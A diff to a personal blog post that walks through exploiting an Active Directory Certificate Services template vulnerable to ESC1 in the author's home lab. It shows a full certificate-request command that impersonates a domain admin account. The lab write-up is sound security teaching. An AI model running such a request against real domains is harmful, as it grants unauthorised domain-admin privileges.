cxjosh/joshcx/content/posts/adcs.md

  ![VulnTemplate](/VulnTemplate.png)

- straight away you can see we've found a template vulnerable to ESC1, next we can leverage this and request a certificate with the SAN being "domain_admin" with the payload looking a little something like this:
+ straight away you can see we've found a template vulnerable to ESC1, next we can leverage this and request a certificate with the SAN being "domain_admin" (a domain admin user i setup) with the payload looking a little something like this:

  > python3 entry.py req -u joshua@cxlabs.local -p REDACTED -target 192.168.197.129 -template VulnTemplate -ca "CXLABS-CXLABS-DC-01-CA" -upn "domain_admin@cxlabs.local"